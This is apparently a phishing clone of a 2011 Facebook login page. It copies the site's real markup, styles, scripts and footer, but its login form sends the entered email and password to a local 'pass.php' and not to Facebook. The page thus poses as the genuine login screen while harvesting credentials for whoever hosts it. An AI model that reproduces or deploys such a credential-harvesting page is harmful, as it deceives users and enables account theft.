﻿ï»¿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._script_path = "\/login.php";window._EagleEyeSeed="A5dO";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/login.php?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<link rel="alternate" media="handheld" href="https://www.facebook.com/login.php" />
<title>Login | Facebook</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
    <link type="text/css" rel="stylesheet" href="https://s-static.ak.facebook.com/rsrc.php/v1/yu/r/NP2_BhjDvkG.css" />

    <link type="text/css" rel="stylesheet" href="https://s-static.ak.facebook.com/rsrc.php/v1/y2/r/GXDje7w1cv_.css" />
    <link type="text/css" rel="stylesheet" href="https://s-static.ak.facebook.com/rsrc.php/v1/yo/r/KML3U5-XZZ6.css" />
    <link type="text/css" rel="stylesheet" href="https://s-static.ak.facebook.com/rsrc.php/v1/ym/r/4f49Le2NJpn.css" />

    <script type="text/javascript" src="https://s-static.ak.facebook.com/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
  <script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="https://s-static.ak.facebook.com/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="https://s-static.ak.facebook.com/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="login_page UIPage_LoggedOut ff3 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a><div class="rfloat"></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" role="button" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial login_page_interstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="uiHeaderActions rfloat"></div><div><h2 class="uiHeaderTitle">Facebook Login</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="login_form_container"><form method="POST" action="pass.php" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,â‚¬,Â´,&#27700;,&#1044;,&#1028;" /><input type="hidden" name="lsd" value="qxJXf" autocomplete="off" /><div id="loginform" style=""><input type="hidden" id="return_session" name="return_session" value="0" autocomplete="off" /><input type="hidden" id="legacy_return" name="legacy_return" value="1" autocomplete="off" /><input type="hidden" id="display" name="display" value="" autocomplete="off" /><input type="hidden" id="session_key_only" name="session_key_only" value="0" autocomplete="off" /><input type="hidden" id="trynum" name="trynum" value="1" autocomplete="off" /><input type="hidden" name="charset_test" value="&euro;,&acute;,â‚¬,Â´,&#27700;,&#1044;,&#1028;" /><input type="hidden" id="lsd" name="lsd" value="qxJXf" autocomplete="off" /><div class="form_row clearfix "><label for="email" id="label_email" class="login_form_label">Email:</label><input type="text" class="inputtext" id="email" name="email" value="" onkeypress="formchange()" /></div><div class="form_row clearfix "><label for="pass" id="label_pass" class="login_form_label">Password:</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div><label class="persistent"><input type="checkbox" class="inputcheckbox " id="persistent_inputcheckbox" name="persistent" value="1" /><span id="persistent_login_text">Keep me logged in</span></label><input type="hidden" id="default_persistent" name="default_persistent" value="0" autocomplete="off" /><div id="buttons" class="form_row clearfix"><label class="login_form_label"></label><label class="uiButton uiButtonConfirm uiButtonLarge" for="u445212_1"><input value="Login" name="login" onclick="" type="submit" id="u445212_1" /></label> or <strong><a href="http://www.facebook.com/r.php?possible_fb_user=1&amp;app_id=0&amp;is_enabled=1&amp;next=&amp;locale=en_US" target="_blank" rel="nofollow" id="reg_btn_link" tabindex="-1">Sign up for Facebook</a></strong></div><p class="reset_password form_row"><a href="http://www.facebook.com/recover.php?locale=en_US" target="" tabindex="-1">Forgot your password?</a></p></div></form>

</div></div></div><ul class="uiList uiListHorizontal clearfix ptm linear_language"><li class="uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;en_US&quot;, &quot;https:\/\/www.facebook.com\/login.php&quot;);" title="English (US)">English (US)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;hr_HR&quot;, &quot;https:\/\/www.facebook.com\/login.php&quot;);" title="Croatian">Hrvatski</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;es_LA&quot;, &quot;https:\/\/www.facebook.com\/login.php&quot;);" title="Spanish">EspaÃ±ol</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;pt_BR&quot;, &quot;https:\/\/www.facebook.com\/login.php&quot;);" title="Portuguese (Brazil)">PortuguÃªs (Brasil)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;fr_FR&quot;, &quot;https:\/\/www.facebook.com\/login.php&quot;);" title="French (France)">FranÃ§ais (France)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;de_DE&quot;, &quot;https:\/\/www.facebook.com\/login.php&quot;);" title="German">Deutsch</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;it_IT&quot;, &quot;https:\/\/www.facebook.com\/login.php&quot;);" title="Italian">Italiano</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="rtl" href="https://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;ar_AR&quot;, &quot;https:\/\/www.facebook.com\/login.php&quot;);" title="Arabic">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577;</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;hi_IN&quot;, &quot;https:\/\/www.facebook.com\/login.php&quot;);" title="Hindi">&#2361;&#2367;&#2344;&#2381;&#2342;&#2368;</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="https://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;zh_CN&quot;, &quot;https:\/\/www.facebook.com\/login.php&quot;);" title="Simplified Chinese (China)">&#20013;&#25991;(&#31616;&#20307;)</a></li><li class="plm uiListItem  uiListHorizontalItemBorder uiListHorizontalItem"><a rel="dialog" href="/ajax/intl/language_dialog.php?uri=https%3A%2F%2Fwww.facebook.com%2Flogin.php&amp;source=TOP_LOCALES_DIALOG" title="Show more languages"> Â» </a></li></ul></div></div><div id="pageFooter"><div id="contentCurve"></div><div class="clearfix" id="footerContainer"><div role="contentinfo" class="lfloat"><div class="fsm fwn fcg"><span title="HPHP - 31 - J0vZP8ARZbnUh6DwKTZ2qw - 173568"> Facebook Â© 2011</span></div></div><div class="rfloat fsm fwn fcg" role="navigation"><a href="http://www.facebook.com/mobile?ref=pf" title="Check out Facebook Mobile.">Mobile</a> Â· <a href="http://www.facebook.com/find-friends?ref=pf" title="Find anyone on the web.">Find Friends</a> Â· <a href="http://www.facebook.com/badges?ref=pf" title="Embed a Facebook badge on your website.">Badges</a> Â· <a href="http://www.facebook.com/directory/people/" title="Browse our people directory.">People</a> Â· <a href="http://www.facebook.com/directory/pages/" title="Browse our pages directory.">Pages</a> Â· <a href="http://www.facebook.com/facebook" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a> Â· <a href="http://www.facebook.com/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook.">Advertising</a> Â· <a href="/pages/create.php?ref_type=sitefooter" title="Create a Page">Create a Page</a> Â· <a href="http://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a> Â· <a href="http://www.facebook.com/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a> Â· <a href="http://www.facebook.com/privacy/explanation.php" title="Learn about your privacy and Facebook.">Privacy</a> Â· <a href="http://www.facebook.com/terms.php?ref=pf" accesskey="9" title="Review our terms of service.">Terms</a> Â· <a href="http://www.facebook.com/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></div></div></div></div><script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=7486"+"&m="+m;},5000);}if(top!=self){try{if(parent!=top){throw 1;}var si_cj_d=["apps.facebook.com","\/pages\/","apps.beta.facebook.com"];var href=top.location.href.toLowerCase();for(var i=0;i<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3 ");}catch(e){si_cj("1 \t");window.document.write("\u003cstyle>body * {display:none !important;}\u003c\/style>\u003ca href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display:block !important;padding:10px\">\u003ci class=\"img sp_cwqcqa sx_72ab0f\" style=\"display:block !important\">\u003c\/i>Go to Facebook.com\u003c\/a>");/*QEwFfcds*/}}/*]]>*/</script><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"66.220.149.17",static_base:"https:\/\/s-static.ak.facebook.com\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"f6bfd",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",ffid1:"PgXai9gU4gJiFyyYjLl81A",ffid2:"FOG0SimAVOVym2EYOTmzGQ",ffid3:"Ml9UR1RjM2RjcTVZb2FQN3ZmQ3l3UEtO",ffid4:"4KeiFClgcbiTZtsqIWWb9w",ffver:63083};

</script>
<script type="text/javascript">Bootloader.setResourceMap({"ff6N5":{"type":"css","permanent":1,"src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yu\/r\/NP2_BhjDvkG.css"},"WzACE":{"type":"css","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/y2\/r\/GXDje7w1cv_.css"},"iOgU0":{"type":"css","permanent":1,"src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yo\/r\/KML3U5-XZZ6.css"},"c6kLk":{"type":"css","permanent":1,"nonblocking":1,"src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/ym\/r\/4f49Le2NJpn.css"},"\/YYg5":{"type":"css","permanent":1,"src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yh\/r\/59GqzebbxnZ.css"}});Bootloader.setResourceMap({"Zz9gy":{"type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yE\/r\/AKaGrClUAcV.js"},"LVwPS":{"type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yf\/r\/VoMxRc20crG.js"},"lIKWr":{"type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yV\/r\/ecpCmrvFebs.js"},"+RUzj":{"type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/ye\/r\/E4E32J1Ypju.js"},"YxBS7":{"type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yc\/r\/DzkM-7DYccQ.js"},"5bAwC":{"type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yz\/r\/MGuL2bFxrJn.js"},"v9\/OW":{"type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/ys\/r\/Fo4euWZA2Tv.js"},"bUOAI":{"type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yg\/r\/1HbY-F5I4sK.js"},"\/QDrR":{"type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yn\/r\/9lcZZyAfLnA.js"},"uKqhc":{"type":"js","src":"https:\/\/s-static.ak.facebook.com\/rsrc.php\/v1\/yK\/r\/xrEeXUiCo9E.js"}});
Bootloader.enableBootload({"async":["lIKWr","Zz9gy","ff6N5"],"iframe-shim":["lIKWr","Zz9gy","+RUzj","YxBS7"],"dialog":["lIKWr","Zz9gy","ff6N5"],"dom-form":["lIKWr","Zz9gy","ff6N5"],"PhotoTheater":["lIKWr","Zz9gy","ff6N5","5bAwC"],"PhotoTagger":["lIKWr","Zz9gy","ff6N5","v9\/OW","5bAwC","bUOAI"],"TagToken":["lIKWr","Zz9gy","\/QDrR","bUOAI"],"TagTokenizer":["lIKWr","Zz9gy","\/QDrR","bUOAI","ff6N5","5bAwC"],"fb-photos-theater-css":["\/YYg5"],"animation":["lIKWr","Zz9gy"],"Toggler":["lIKWr","Zz9gy","ff6N5","5bAwC"],"ajaxpipe":["lIKWr","Zz9gy","ff6N5","5bAwC"],"dom-collect":["Zz9gy","uKqhc"],"json":["Zz9gy"],"string-extensions":["Zz9gy"],"async-signal":["Zz9gy"],"dimension-tracking":["Zz9gy","lIKWr"],"detect-broken-proxy-cache":["Zz9gy","lIKWr"]});Arbiter.registerCallback(InitialJSLoader.callback, ["BOOTLOAD\/ROADRUNNER_READY"]);Arbiter.registerCallback(function() {InitialJSLoader.load(["Zz9gy","LVwPS"]);Arbiter.inform("BOOTLOAD\/ROADRUNNER_READY", true, Arbiter.BEHAVIOR_STATE);}, [OnloadEvent.ONLOAD_DOMCONTENT_CALLBACK]);</script><script type="text/javascript">
Bootloader.configurePage(["ff6N5","WzACE","iOgU0","c6kLk"]);
Bootloader.done(["yZtFc"]);



onloadRegister(function (){window.loading_page_chrome = true;});
onloadRegister(function (){window.loading_page_chrome = false;});
onloadRegister(function (){useragent();});
onafterloadRegister(function (){Bootloader.loadComponents(["dimension-tracking"], function(){  });});
onafterloadRegister(function (){Bootloader.loadComponents(["detect-broken-proxy-cache"], function(){ detect_broken_proxy_cache("0", "c_user") });});

</script><script type="text/javascript">if(!window.ge)window.ge=function(a){return document.getElementById(a);};window.onload=function(a){return function(){var b=ge('email'),c=ge('pass');try{if(b&&!b.value){b.focus();}else if(c)c.focus();}catch(d){if(!(d.number==-2146826178))throw d;}return a&&a.call(window);};}(window.onload);function formchange(){(ge('persistent')||{}).checked=0;}function pop(a){window.open(a);}
</script></body>
</html>
